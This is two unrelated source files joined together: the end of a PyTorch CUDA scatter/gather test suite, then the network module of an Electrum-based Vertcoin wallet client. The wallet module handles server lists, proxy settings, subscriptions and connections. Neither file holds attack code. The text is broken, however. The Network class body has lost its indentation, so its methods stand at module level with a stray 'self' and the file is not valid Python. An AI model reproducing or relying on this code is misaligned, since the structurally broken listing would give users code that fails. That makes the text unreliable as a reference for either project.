        nhwc = torch.randn((10, 3, 32, 32), device='cpu').contiguous(memory_format=torch.channels_last)
        results = torch.cuda.comm.scatter(nhwc, (0, 1), None, 0)
        for result in results:
            self.assertFalse(result.is_contiguous())
            self.assertTrue(result.is_contiguous(memory_format=torch.channels_last))
        gathered = torch.cuda.comm.gather(results)
        self.assertTrue(gathered.is_contiguous(memory_format=torch.channels_last))
    def test_matmul_device_mismatch(self):
        """matmul/addmm across cpu and cuda operands must raise; same-device
        combinations must succeed."""
        cpu = torch.rand((10, 10))
        cuda = cpu.cuda()
        with self.assertRaisesRegex(RuntimeError, "Expected all tensors to be on the same device"):
            cpu @ cuda
        with self.assertRaisesRegex(RuntimeError, "Expected all tensors to be on the same device"):
            cuda @ cpu
        for s, m1, m2 in product((cpu, cuda), repeat=3):
            if s.device == m1.device == m2.device:
                torch.addmm(s, m1, m2)
            else:
                with self.assertRaisesRegex(RuntimeError, "Expected all tensors to be on the same device"):
                    torch.addmm(s, m1, m2)
    @unittest.skipIf(not TEST_MULTIGPU, "Test needs multiple GPUs")
    def test_scatter_namedtuple(self):
        # tests ability to scatter namedtuples and retrieve a list where each
        # element is of the expected namedtuple type.
        fields = ("a", "b")
        TestNamedTupleInput_0 = collections.namedtuple("NamedTuple", fields)
        num_gpus = torch.cuda.device_count()
        a = torch.rand(num_gpus * 2, device=0)
        b = torch.rand(num_gpus * 2, device=0)
        # expected per-GPU slices: 2 elements per device, moved to that device
        a_tensors_for_gpu = [a[2 * i : 2 * i + 2].to(i) for i in range(num_gpus)]
        b_tensors_for_gpu = [b[2 * i : 2 * i + 2].to(i) for i in range(num_gpus)]
        inp = TestNamedTupleInput_0(a, b)
        target_gpus = [torch.device(i) for i in range(num_gpus)]
        scatter_out = scatter_gather.scatter(inp, target_gpus)
        for i, x in enumerate(scatter_out):
            self.assertTrue(isinstance(x, type(inp)))
            self.assertEqual(x._fields, fields)
            expected_a = a_tensors_for_gpu[i]
            expected_b = b_tensors_for_gpu[i]
            self.assertEqual(expected_a, x.a)
            self.assertEqual(expected_b, x.b)
        # repeat with a typing.NamedTuple subclass instead of collections.namedtuple
        class TestNamedTupleInput_1(NamedTuple):
            a: torch.tensor
            b: torch.tensor
        a = torch.rand(num_gpus * 2, device=0)
        b = torch.rand(num_gpus * 2, device=0)
        a_tensors_for_gpu = [a[2 * i : 2 * i + 2].to(i) for i in range(num_gpus)]
        b_tensors_for_gpu = [b[2 * i : 2 * i + 2].to(i) for i in range(num_gpus)]
        inp = TestNamedTupleInput_1(a, b)
        scatter_out = scatter_gather.scatter(inp, target_gpus)
        for i, x in enumerate(scatter_out):
            self.assertTrue(isinstance(x, type(inp)))
            self.assertEqual(x._fields, fields)
            expected_a = a_tensors_for_gpu[i]
            expected_b = b_tensors_for_gpu[i]
            self.assertEqual(expected_a, x.a)
            self.assertEqual(expected_b, x.b)
    @unittest.skipIf(not TEST_MULTIGPU, "Test needs multiple GPUs")
    def test_gather_namedtuple(self):
        # tests ability to gather a list of namedtuples and return a namedtuple where each
        # element is of the expected tensor type.
        fields = ['a', 'b']
        TestNamedTupleInput_0 = collections.namedtuple('NamedTuple', fields)
        num_gpus = torch.cuda.device_count()
        a = torch.rand(num_gpus * 2, device=0)
        b = torch.rand(num_gpus * 2, device=1)
        out1 = TestNamedTupleInput_0(a, b)
        a = torch.rand(num_gpus * 2, device=1)
        b = torch.rand(num_gpus * 2, device=0)
        out2 = TestNamedTupleInput_0(a, b)
        outputs = [out1, out2]
        out = scatter_gather.gather(outputs, 'cpu')  # test on CPU
        for i, x in enumerate(out):
            self.assertTrue(isinstance(x, type(out2[-1])))  # x must be a tensor
            cat = torch.cat((outputs[0][i].to('cpu'), outputs[1][i].to('cpu')))
            self.assertTrue(torch.equal(x, cat))
        out = scatter_gather.gather(outputs, 0)  # test on GPU
        for i, x in enumerate(out):
            self.assertTrue(isinstance(x, type(out2[-1])))
            cat = torch.cat((outputs[0][i].to(0), outputs[1][i].to(0)))
            self.assertTrue(torch.equal(x, cat))
        # repeat with a typing.NamedTuple subclass instead of collections.namedtuple
        class TestNamedTupleInput_1(NamedTuple):
            a: torch.tensor
            b: torch.tensor
        a = torch.rand(num_gpus * 2, device=0)
        b = torch.rand(num_gpus * 2, device=1)
        out1 = TestNamedTupleInput_1(a, b)
        a = torch.rand(num_gpus * 2, device=1)
        b = torch.rand(num_gpus * 2, device=0)
        out2 = TestNamedTupleInput_1(a, b)
        outputs = [out1, out2]
        out = scatter_gather.gather(outputs, 0)  # test on GPU
        for i, x in enumerate(out):
            self.assertTrue(isinstance(x, type(out2[-1])))
            cat = torch.cat((outputs[0][i].to(0), outputs[1][i].to(0)))
            self.assertTrue(torch.equal(x, cat))
        out = scatter_gather.gather(outputs, 'cpu')  # test on CPU
        for i, x in enumerate(out):
            self.assertTrue(isinstance(x, type(out2[-1])))
            cat = torch.cat((outputs[0][i].to('cpu'), outputs[1][i].to('cpu')))
            self.assertTrue(torch.equal(x, cat))
# Standard test-suite entry point: run the tests defined above.
if __name__ == '__main__':
    run_tests()
|
network.py
|
# Electrum - Lightweight Bitcoin Client
# Copyright (c) 2011-2016 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import time
import Queue
import os
import errno
import sys
import random
import select
import traceback
from collections import defaultdict, deque
import threading
import socks
import socket
import json
import util
import bitcoin
from bitcoin import *
from interface import Connection, Interface
import blockchain
from version import ELECTRUM_VERSION, PROTOCOL_VERSION
# Default ports per transport: 't' = plain TCP, 's' = SSL.
DEFAULT_PORTS = {'t':'55001', 's':'55002'}
#There is a schedule to move the default list to e-x (electrumx) by Jan 2018
#Schedule is as follows:
#move ~3/4 to e-x by 1.4.17
#then gradually switch remaining nodes to e-x nodes
# Hard-coded bootstrap list of public Electrum servers, keyed by hostname.
# NOTE(review): Network.get_servers() may add entries to the dict it returns;
# callers must not mutate this module-level table.
DEFAULT_SERVERS = {
    'fr1.vtconline.org': DEFAULT_PORTS,
    'uk1.vtconline.org': DEFAULT_PORTS,
    'vtc.horriblecoders.com': DEFAULT_PORTS,
    'vtc.lukechilds.co': DEFAULT_PORTS,
    'vtc-cce-1.coinomi.net': {'t':'5028'},
    'vtc-cce-2.coinomi.net': {'t':'5028'},
    'electrum.catpool.io': DEFAULT_PORTS,
    'electrum2.catpool.io': DEFAULT_PORTS,
    'www.verters.com': {'t': '51001'},
}
'''
def set_testnet():
global DEFAULT_PORTS, DEFAULT_SERVERS
DEFAULT_PORTS = {'t':'51001', 's':'51002'}
DEFAULT_SERVERS = {
'electrum-ltc.bysh.me': DEFAULT_PORTS,
'electrum.ltc.xurious.com': DEFAULT_PORTS,
}
'''
def set_nolnet():
    """Repoint the module-level defaults at the 'nolnet' test network.

    Rebinds DEFAULT_PORTS and DEFAULT_SERVERS in place of the mainnet values;
    must be called before any Network object is constructed.
    """
    global DEFAULT_PORTS, DEFAULT_SERVERS
    DEFAULT_PORTS = {'t': '52001', 's': '52002'}
    DEFAULT_SERVERS = {
        '14.3.140.101': DEFAULT_PORTS,
    }
NODES_RETRY_INTERVAL = 60
SERVER_RETRY_INTERVAL = 10
def parse_servers(result):
    """Parse a 'server.peers.subscribe' result list into a hostmap dict.

    Each item looks like (ip, host, [features...]); features are short tags:
    't<port>'/'s<port>' for transports, 'v<version>', 'p<pruning-level>'.
    Only servers advertising a recent-enough protocol version are kept.
    """
    from version import PROTOCOL_VERSION
    servers = {}
    for item in result:
        host = item[1]
        out = {}
        version = None
        pruning_level = '-'
        if len(item) > 2:
            for v in item[2]:
                if re.match("[st]\d*", v):
                    protocol, port = v[0], v[1:]
                    # empty port tag means "uses the default port"
                    if port == '': port = DEFAULT_PORTS[protocol]
                    out[protocol] = port
                elif re.match("v(.?)+", v):
                    version = v[1:]
                elif re.match("p\d*", v):
                    pruning_level = v[1:]
                    if pruning_level == '': pruning_level = '0'
        # NOTE(review): cmp() is Python-2-only; on Python 3 this always falls
        # into the except branch and the server is dropped.
        try:
            is_recent = cmp(util.normalize_version(version), util.normalize_version(PROTOCOL_VERSION)) >= 0
        except Exception:
            is_recent = False
        if out and is_recent:
            out['pruning'] = pruning_level
            servers[host] = out
    return servers
def filter_protocol(hostmap, protocol='s'):
    '''Filters the hostmap for those implementing protocol.
    The result is a list in serialized form.'''
    return [serialize_server(host, portmap.get(protocol), protocol)
            for host, portmap in hostmap.items()
            if portmap.get(protocol)]
def pick_random_server(hostmap=None, protocol='s', exclude_set=None):
    """Return one random eligible server string, or None if none qualify.

    hostmap      -- host -> portmap dict; defaults to DEFAULT_SERVERS.
    protocol     -- 's' (SSL) or 't' (TCP).
    exclude_set  -- servers to skip; defaults to empty.  The original code
                    used a mutable default argument (``exclude_set=set()``);
                    a None sentinel avoids that anti-pattern while keeping
                    the same behavior for all callers.
    """
    if hostmap is None:
        hostmap = DEFAULT_SERVERS
    if exclude_set is None:
        exclude_set = set()
    eligible = list(set(filter_protocol(hostmap, protocol)) - exclude_set)
    return random.choice(eligible) if eligible else None
from simple_config import SimpleConfig
proxy_modes = ['socks4', 'socks5', 'http']
def serialize_proxy(p):
    """Flatten a proxy dict into the 'mode:host:port:user:password' config
    string; returns None when p is not a plain dict."""
    if type(p) != dict:
        return None
    keys = ('mode', 'host', 'port', 'user', 'password')
    return ':'.join([p.get(k) for k in keys])
def deserialize_proxy(s):
    """Parse a 'mode:host:port:user:password' config string into a proxy dict.

    Every field after the first is optional and positional; missing fields
    fall back to socks5/localhost and a mode-dependent default port.
    Returns None for non-strings or the literal string 'none'.
    NOTE(review): the `unicode` check makes this Python-2-only.
    """
    if type(s) not in [str, unicode]:
        return None
    if s.lower() == 'none':
        return None
    proxy = { "mode":"socks5", "host":"localhost" }
    args = s.split(':')
    n = 0
    # consume the mode field only if it is a recognized proxy mode
    if proxy_modes.count(args[n]) == 1:
        proxy["mode"] = args[n]
        n += 1
    if len(args) > n:
        proxy["host"] = args[n]
        n += 1
    if len(args) > n:
        proxy["port"] = args[n]
        n += 1
    else:
        # default port depends on the mode
        proxy["port"] = "8080" if proxy["mode"] == "http" else "1080"
    if len(args) > n:
        proxy["user"] = args[n]
        n += 1
    if len(args) > n:
        proxy["password"] = args[n]
    return proxy
def deserialize_server(server_str):
    """Parse a 'host:port:protocol' server string into its three parts.

    Raises if there are not exactly three colon-separated fields, if the
    protocol is not 's' (SSL) or 't' (TCP), or if the port is not numeric.
    """
    parts = str(server_str).split(':')
    host, port, protocol = parts
    assert protocol in 'st'
    int(port)  # raises ValueError when the port is not an integer
    return host, port, protocol
def serialize_server(host, port, protocol):
    """Inverse of deserialize_server: join the three string fields with ':'."""
    fields = [host, port, protocol]
    return str(':'.join(fields))
class Network(util.DaemonThread):
"""The Network class manages a set of connections to remote electrum
servers, each connected socket is handled by an Interface() object.
Connections are initiated by a Connection() thread which stops once
the connection succeeds or fails.
Our external API:
- Member functions get_header(), get_interfaces(), get_local_height(),
get_parameters(), get_server_height(), get_status_value(),
is_connected(), set_parameters(), stop()
"""
def __init__(self, config=None):
    """Build the network manager and immediately kick off connections.

    config may be a plain dict (wrapped into SimpleConfig) or an existing
    config object.  Picks/sanitizes the default server, loads blockchain
    headers and recent-server history, then calls start_network().
    """
    if config is None:
        config = {}  # Do not use mutables as default values!
    util.DaemonThread.__init__(self)
    self.config = SimpleConfig(config) if type(config) == type({}) else config
    # 'oneserver' mode disables the redundant background connections
    self.num_server = 10 if not self.config.get('oneserver') else 0
    self.blockchains = blockchain.read_blockchains(self.config)
    self.print_error("blockchains", self.blockchains.keys())
    self.blockchain_index = config.get('blockchain_index', 0)
    if self.blockchain_index not in self.blockchains.keys():
        self.blockchain_index = 0
    # Server for addresses and transactions
    self.default_server = self.config.get('server')
    # Sanitize default server
    try:
        deserialize_server(self.default_server)
    except:
        self.default_server = None
    if not self.default_server:
        self.default_server = pick_random_server()
    self.lock = threading.Lock()
    self.pending_sends = []
    self.message_id = 0  # monotonically increasing JSON-RPC id
    self.debug = False
    self.irc_servers = {} # returned by interface (list from irc)
    self.recent_servers = self.read_recent_servers()
    self.banner = ''
    self.donation_address = ''
    self.relay_fee = None
    # callbacks passed with subscriptions
    self.subscriptions = defaultdict(list)
    self.sub_cache = {}
    # callbacks set by the GUI
    self.callbacks = defaultdict(list)
    # certificate store for SSL server validation
    dir_path = os.path.join( self.config.path, 'certs')
    if not os.path.exists(dir_path):
        os.mkdir(dir_path)
    # subscriptions and requests
    self.subscribed_addresses = set()
    # Requests from client we've not seen a response to
    self.unanswered_requests = {}
    # retry times
    self.server_retry_time = time.time()
    self.nodes_retry_time = time.time()
    # kick off the network. interface is the main server we are currently
    # communicating with. interfaces is the set of servers we are connecting
    # to or have an ongoing connection with
    self.interface = None
    self.interfaces = {}
    self.auto_connect = self.config.get('auto_connect', True)
    self.connecting = set()
    self.socket_queue = Queue.Queue()
    self.start_network(deserialize_server(self.default_server)[2],
                       deserialize_proxy(self.config.get('proxy')))
def register_callback(self, callback, events):
    """Subscribe `callback` to every event name in `events`."""
    with self.lock:
        for name in events:
            self.callbacks[name].append(callback)
def unregister_callback(self, callback):
    """Remove `callback` from every event it is registered for."""
    with self.lock:
        for registered in self.callbacks.values():
            if callback in registered:
                registered.remove(callback)
def trigger_callback(self, event, *args):
    """Invoke every callback registered for `event`, passing (event, *args).

    The list is snapshotted under the lock so callbacks may register or
    unregister without breaking the iteration, and the calls themselves
    happen outside the lock.
    """
    with self.lock:
        callbacks = self.callbacks[event][:]
    # Plain loop instead of the original throwaway list comprehension:
    # these calls are executed purely for their side effects.
    for callback in callbacks:
        callback(event, *args)
def read_recent_servers(self):
    """Load the recently-used server list from the config directory.

    Returns [] when there is no config path, the file is missing, or its
    contents are not valid JSON.
    """
    if not self.config.path:
        return []
    path = os.path.join(self.config.path, "recent_servers")
    try:
        with open(path, "r") as f:
            data = f.read()
        return json.loads(data)
    except Exception:
        # Missing or corrupt history is non-fatal: start with an empty list.
        # (Narrowed from a bare `except:`, which would also have swallowed
        # KeyboardInterrupt/SystemExit.)
        return []
def save_recent_servers(self):
    """Persist self.recent_servers as pretty-printed JSON; best-effort only."""
    if not self.config.path:
        return
    path = os.path.join(self.config.path, "recent_servers")
    s = json.dumps(self.recent_servers, indent=4, sort_keys=True)
    try:
        with open(path, "w") as f:
            f.write(s)
    except Exception:
        # Failure to persist history is non-fatal and deliberately ignored.
        # (Narrowed from a bare `except:` so Ctrl-C is not swallowed.)
        pass
def get_server_height(self):
    """Chain height reported by the main interface, or 0 when disconnected."""
    if self.interface:
        return self.interface.tip
    return 0
def server_is_lagging(self):
    """Return True when the main server is behind our local chain.

    A server with no reported height counts as lagging; otherwise it lags
    when the local height exceeds the server height by more than one block.
    """
    server_height = self.get_server_height()
    if not server_height:
        self.print_error('no height for main interface')
        return True
    local_height = self.get_local_height()
    lagging = (local_height - server_height) > 1
    if lagging:
        self.print_error('%s is lagging (%d vs %d)' % (self.default_server, server_height, local_height))
    return lagging
def set_status(self, status):
    """Record the new connection status and notify 'status' listeners."""
    self.connection_status = status
    self.notify('status')
def is_connected(self):
    """True when a main interface is currently established."""
    return self.interface is not None
def is_connecting(self):
    """True while a connection attempt to the default server is in flight."""
    return self.connection_status == 'connecting'
def is_up_to_date(self):
    """True when every queued client request has received its response."""
    return self.unanswered_requests == {}
def queue_request(self, method, params, interface=None):
    """Queue a JSON-RPC request on `interface` (default: main interface).

    Allocates and returns the message id so the caller can correlate the
    eventual response.
    """
    # If you want to queue a request on any interface it must go
    # through this function so message ids are properly tracked
    if interface is None:
        interface = self.interface
    message_id = self.message_id
    self.message_id += 1
    if self.debug:
        self.print_error(interface.host, "-->", method, params, message_id)
    interface.queue_request(method, params, message_id)
    return message_id
def send_subscriptions(self):
    """Replay session state onto the (new) main interface.

    Re-queues every still-unanswered request under fresh message ids, then
    re-issues the standing server queries and address subscriptions.
    """
    self.print_error('sending subscriptions to', self.interface.server, len(self.unanswered_requests), len(self.subscribed_addresses))
    self.sub_cache.clear()
    # Resend unanswered requests
    requests = self.unanswered_requests.values()
    self.unanswered_requests = {}
    for request in requests:
        message_id = self.queue_request(request[0], request[1])
        self.unanswered_requests[message_id] = request
    self.queue_request('server.banner', [])
    self.queue_request('server.donation_address', [])
    self.queue_request('server.peers.subscribe', [])
    for i in bitcoin.FEE_TARGETS:
        self.queue_request('blockchain.estimatefee', [i])
    self.queue_request('blockchain.relayfee', [])
    for addr in self.subscribed_addresses:
        self.queue_request('blockchain.address.subscribe', [addr])
def get_status_value(self, key):
    """Map a notification key to its current value for GUI callbacks.

    NOTE(review): an unrecognized key falls through every branch and raises
    UnboundLocalError on `value` — callers must pass a known key.
    """
    if key == 'status':
        value = self.connection_status
    elif key == 'banner':
        value = self.banner
    elif key == 'fee':
        value = self.config.fee_estimates
    elif key == 'updated':
        value = (self.get_local_height(), self.get_server_height())
    elif key == 'servers':
        value = self.get_servers()
    elif key == 'interfaces':
        value = self.get_interfaces()
    return value
def notify(self, key):
    """Fire the callbacks for `key`; 'status' and 'updated' carry no payload."""
    if key in ('status', 'updated'):
        self.trigger_callback(key)
    else:
        self.trigger_callback(key, self.get_status_value(key))
def get_parameters(self):
    """Return (host, port, protocol, proxy, auto_connect) for the current setup."""
    host, port, protocol = deserialize_server(self.default_server)
    return host, port, protocol, self.proxy, self.auto_connect
def get_donation_address(self):
    """Server's donation address, or implicitly None while disconnected."""
    if self.is_connected():
        return self.donation_address
def get_interfaces(self):
    '''The interfaces that are in connected state'''
    # NOTE(review): on Python 2 .keys() returns a list, which callers
    # (e.g. switch_to_random_interface) mutate with .remove().
    return self.interfaces.keys()
def get_servers(self):
    """Return the known hostmap: IRC-discovered servers (if any) merged over
    the defaults, plus recently-used servers not already present.

    Always returns a fresh dict that the caller may mutate freely.
    """
    if self.irc_servers:
        out = self.irc_servers.copy()
        out.update(DEFAULT_SERVERS)
    else:
        # Copy: the original code aliased DEFAULT_SERVERS here, so adding
        # recent servers below silently mutated the module-level table.
        out = dict(DEFAULT_SERVERS)
    for s in self.recent_servers:
        try:
            host, port, protocol = deserialize_server(s)
        except Exception:
            # skip malformed entries from the persisted history
            continue
        if host not in out:
            out[host] = { protocol:port }
    return out
def start_interface(self, server):
    """Begin connecting to `server` unless already connected/connecting."""
    if (not server in self.interfaces and not server in self.connecting):
        if server == self.default_server:
            self.print_error("connecting to %s as new interface" % server)
            self.set_status('connecting')
        self.connecting.add(server)
        # NOTE(review): the Connection object is not retained here; it is
        # presumably a self-starting thread that reports back through
        # self.socket_queue — confirm against interface.Connection.
        c = Connection(server, self.socket_queue, self.config.path)
def start_random_interface(self):
    """Open a connection to one random server we are not already using."""
    already_used = self.disconnected_servers.union(set(self.interfaces))
    choice = pick_random_server(self.get_servers(), self.protocol, already_used)
    if choice:
        self.start_interface(choice)
def start_interfaces(self):
    """Connect to the main server plus random peers up to num_server total."""
    self.start_interface(self.default_server)
    for _ in range(self.num_server - 1):
        self.start_random_interface()
def set_proxy(self, proxy):
    """Install (or remove) a global SOCKS/HTTP proxy by monkey-patching the
    socket module; affects every subsequent connection process-wide."""
    self.proxy = proxy
    if proxy:
        self.print_error('setting proxy', proxy)
        # socks module numbers its proxy types starting at 1
        proxy_mode = proxy_modes.index(proxy["mode"]) + 1
        socks.setdefaultproxy(proxy_mode,
                              proxy["host"],
                              int(proxy["port"]),
                              # socks.py seems to want either None or a non-empty string
                              username=(proxy.get("user", "") or None),
                              password=(proxy.get("password", "") or None))
        socket.socket = socks.socksocket
        # prevent dns leaks, see http://stackoverflow.com/questions/13184205/dns-over-proxy
        socket.getaddrinfo = lambda *args: [(socket.AF_INET, socket.SOCK_STREAM, 6, '', (args[0], args[1]))]
    else:
        # restore the stock implementations
        # NOTE(review): socket._socketobject / socket._socket are Python-2
        # internals; this branch is not portable to Python 3.
        socket.socket = socket._socketobject
        socket.getaddrinfo = socket._socket.getaddrinfo
def start_network(self, protocol, proxy):
    """Bring the network up from a fully stopped state.

    Preconditions (asserted): no live interfaces, no pending connections.
    Sets the transport protocol and proxy, then opens the interfaces.
    """
    assert not self.interface and not self.interfaces
    assert not self.connecting and self.socket_queue.empty()
    self.print_error('starting network')
    self.disconnected_servers = set([])
    self.protocol = protocol
    self.set_proxy(proxy)
    self.start_interfaces()
def stop_network(self):
    """Close every interface and discard pending connection attempts."""
    self.print_error("stopping network")
    for interface in self.interfaces.values():
        self.close_interface(interface)
    if self.interface:
        self.close_interface(self.interface)
    assert self.interface is None
    assert not self.interfaces
    self.connecting = set()
    # Get a new queue - no old pending connections thanks!
    self.socket_queue = Queue.Queue()
def set_parameters(self, host, port, protocol, proxy, auto_connect):
    """Apply new user-chosen connection settings.

    Validates the inputs, persists them to the config, then restarts the
    network (proxy/protocol change), switches server (server change), or
    just checks for lag (no change).  Silently returns on invalid input or
    when the config rejects the change.
    """
    proxy_str = serialize_proxy(proxy)
    server = serialize_server(host, port, protocol)
    # sanitize parameters
    try:
        deserialize_server(serialize_server(host, port, protocol))
        if proxy:
            proxy_modes.index(proxy["mode"]) + 1
            int(proxy['port'])
    except:
        return
    self.config.set_key('auto_connect', auto_connect, False)
    self.config.set_key("proxy", proxy_str, False)
    self.config.set_key("server", server, True)
    # abort if changes were not allowed by config
    if self.config.get('server') != server or self.config.get('proxy') != proxy_str:
        return
    self.auto_connect = auto_connect
    if self.proxy != proxy or self.protocol != protocol:
        # Restart the network defaulting to the given server
        self.stop_network()
        self.default_server = server
        self.start_network(protocol, proxy)
    elif self.default_server != server:
        self.switch_to_interface(server)
    else:
        self.switch_lagging_interface()
        self.notify('updated')
def switch_to_random_interface(self):
    '''Switch to a random connected server other than the current one'''
    candidates = self.get_interfaces()  # Those in connected state
    if self.default_server in candidates:
        candidates.remove(self.default_server)
    if candidates:
        self.switch_to_interface(random.choice(candidates))
def switch_lagging_interface(self):
    '''If auto_connect and lagging, switch interface'''
    if self.server_is_lagging() and self.auto_connect:
        # switch to one that has the correct header (not height)
        header = self.blockchain().read_header(self.get_local_height())
        candidates = [server for server, iface in self.interfaces.items()
                      if iface.tip_header == header]
        if candidates:
            self.switch_to_interface(random.choice(candidates))
def switch_to_interface(self, server):
    '''Switch to server as our interface. If no connection exists nor
    being opened, start a thread to connect. The actual switch will
    happen on receipt of the connection notification. Do nothing
    if server already is our interface.'''
    self.default_server = server
    if server not in self.interfaces:
        # Not connected yet: clear the active interface and kick off a
        # connection attempt; the switch completes in new_interface().
        self.interface = None
        self.start_interface(server)
        return
    i = self.interfaces[server]
    if self.interface != i:
        self.print_error("switching to", server)
        # stop any current interface in order to terminate subscriptions
        # fixme: we don't want to close headers sub
        #self.close_interface(self.interface)
        self.interface = i
        # Re-send subscriptions so the new server starts notifying us.
        self.send_subscriptions()
        self.set_status('connected')
        self.notify('updated')
def close_interface(self, interface):
    """Close a server interface and drop our bookkeeping for it.

    A falsy (e.g. None) interface is ignored.  If this interface was
    serving the default server, the active interface is cleared too.
    """
    if not interface:
        return
    self.interfaces.pop(interface.server, None)
    if interface.server == self.default_server:
        self.interface = None
    interface.close()
def add_recent_server(self, server):
    """Move (or insert) `server` to the front of the ordered
    recent-servers list, cap it at 20 entries, and persist it."""
    recents = list(self.recent_servers)
    if server in recents:
        recents.remove(server)
    recents.insert(0, server)
    self.recent_servers = recents[:20]
    self.save_recent_servers()
def process_response(self, interface, response, callbacks):
    """Dispatch a single canonical-form response.

    A handful of methods are handled internally (server metadata,
    header notifications, fee estimates, header/chunk replies); every
    response is then also forwarded to the given client callbacks.
    """
    if self.debug:
        self.print_error("<--", response)
    error = response.get('error')
    result = response.get('result')
    method = response.get('method')
    params = response.get('params')
    # We handle some responses; return the rest to the client.
    if method == 'server.version':
        interface.server_version = result
    elif method == 'blockchain.headers.subscribe':
        if error is None:
            self.on_notify_header(interface, result)
    elif method == 'server.peers.subscribe':
        if error is None:
            self.irc_servers = parse_servers(result)
            self.notify('servers')
    elif method == 'server.banner':
        if error is None:
            self.banner = result
            self.notify('banner')
    elif method == 'server.donation_address':
        if error is None:
            self.donation_address = result
    elif method == 'blockchain.estimatefee':
        # presumably result is in coins/kB; converted to int units via
        # COIN and cached per confirmation target -- TODO confirm
        if error is None and result > 0:
            i = params[0]
            fee = int(result*COIN)
            self.config.fee_estimates[i] = fee
            self.print_error("fee_estimates[%d]" % i, fee)
            self.notify('fee')
    elif method == 'blockchain.relayfee':
        if error is None:
            self.relay_fee = int(result * COIN)
            self.print_error("relayfee", self.relay_fee)
    elif method == 'blockchain.block.get_chunk':
        self.on_get_chunk(interface, response)
    elif method == 'blockchain.block.get_header':
        self.on_get_header(interface, response)
    # Forward to client callbacks regardless of internal handling.
    for callback in callbacks:
        callback(response)
def get_index(self, method, params):
    """Hashable key for subscriptions and the response cache: the
    method name, plus ':<first param>' when params are present."""
    if params:
        return '{}:{}'.format(method, params[0])
    return str(method)
def process_responses(self, interface):
    """Drain all responses received on `interface`, normalising
    server-initiated notifications into the same shape as request
    responses before handing them to process_response()."""
    responses = interface.get_responses()
    for request, response in responses:
        if request:
            # Response to an explicit request we sent earlier.
            method, params, message_id = request
            k = self.get_index(method, params)
            # client requests go through self.send() with a
            # callback, are only sent to the current interface,
            # and are placed in the unanswered_requests dictionary
            client_req = self.unanswered_requests.pop(message_id, None)
            if client_req:
                assert interface == self.interface
                callbacks = [client_req[2]]
            else:
                # fixme: will only work for subscriptions
                k = self.get_index(method, params)
                callbacks = self.subscriptions.get(k, [])
            # Copy the request method and params to the response
            response['method'] = method
            response['params'] = params
            # Only once we've received a response to an addr subscription
            # add it to the list; avoids double-sends on reconnection
            if method == 'blockchain.address.subscribe':
                self.subscribed_addresses.add(params[0])
        else:
            # Server-initiated notification (or a dead socket).
            if not response:  # Closed remotely / misbehaving
                self.connection_down(interface.server)
                break
            # Rewrite response shape to match subscription request response
            method = response.get('method')
            params = response.get('params')
            k = self.get_index(method, params)
            if method == 'blockchain.headers.subscribe':
                response['result'] = params[0]
                response['params'] = []
            elif method == 'blockchain.address.subscribe':
                response['params'] = [params[0]]  # addr
                response['result'] = params[1]
            callbacks = self.subscriptions.get(k, [])
        # update cache if it's a subscription
        if method.endswith('.subscribe'):
            self.sub_cache[k] = response
        # Response is now in canonical form
        self.process_response(interface, response, callbacks)
def send(self, messages, callback):
    '''Queue a batch of (method, params) request tuples together with
    the callback that should receive their responses.  The actual send
    happens later in process_pending_sends() on the network thread.'''
    batch = (messages, callback)
    with self.lock:
        self.pending_sends.append(batch)
def process_pending_sends(self):
    """Flush requests queued by send(): register subscription callbacks
    (serving a cached response when one exists) and queue everything
    else on the current interface."""
    # Requests needs connectivity. If we don't have an interface,
    # we cannot process them.
    if not self.interface:
        return
    # Grab-and-clear under the lock so send() can keep appending.
    with self.lock:
        sends = self.pending_sends
        self.pending_sends = []
    for messages, callback in sends:
        for method, params in messages:
            r = None
            if method.endswith('.subscribe'):
                k = self.get_index(method, params)
                # add callback to list
                l = self.subscriptions.get(k, [])
                if callback not in l:
                    l.append(callback)
                self.subscriptions[k] = l
                # check cached response for subscriptions
                r = self.sub_cache.get(k)
            if r is not None:
                util.print_error("cache hit", k)
                callback(r)
            else:
                message_id = self.queue_request(method, params)
                self.unanswered_requests[message_id] = method, params, callback
def unsubscribe(self, callback):
    '''Unsubscribe a callback to free object references to enable GC.'''
    # Note: we can't unsubscribe from the server, so if we receive
    # subsequent notifications process_response() will emit a harmless
    # "received unexpected notification" warning
    with self.lock:
        for callbacks in self.subscriptions.values():
            if callback in callbacks:
                callbacks.remove(callback)
def connection_down(self, server):
    '''A connection to server either went down, or was never made.
    We distinguish by whether it is in self.interfaces.'''
    self.disconnected_servers.add(server)
    if server == self.default_server:
        self.set_status('disconnected')
    iface = self.interfaces.get(server)
    if iface is not None:
        self.close_interface(iface)
        self.notify('interfaces')
    # A chain that was catching up from this server is orphaned.
    for chain in self.blockchains.values():
        if chain.catch_up == server:
            chain.catch_up = None
def new_interface(self, server, socket):
    """A connection attempt to `server` succeeded: wrap the socket in
    an Interface, subscribe to headers, and switch to it if it serves
    the default server."""
    # todo: get tip first, then decide which checkpoint to use.
    self.add_recent_server(server)
    interface = Interface(server, socket)
    # Header-sync state starts in 'default' mode with no pending request.
    interface.blockchain = None
    interface.tip_header = None
    interface.tip = 0
    interface.mode = 'default'
    interface.request = None
    self.interfaces[server] = interface
    self.queue_request('blockchain.headers.subscribe', [], interface)
    if server == self.default_server:
        self.switch_to_interface(server)
    #self.notify('interfaces')
def maintain_sockets(self):
    '''Socket maintenance.'''
    # Responses to connection attempts?
    while not self.socket_queue.empty():
        server, socket = self.socket_queue.get()
        if server in self.connecting:
            self.connecting.remove(server)
        if socket:
            self.new_interface(server, socket)
        else:
            self.connection_down(server)
    # Send pings and shut down stale interfaces
    for interface in self.interfaces.values():
        if interface.has_timed_out():
            self.connection_down(interface.server)
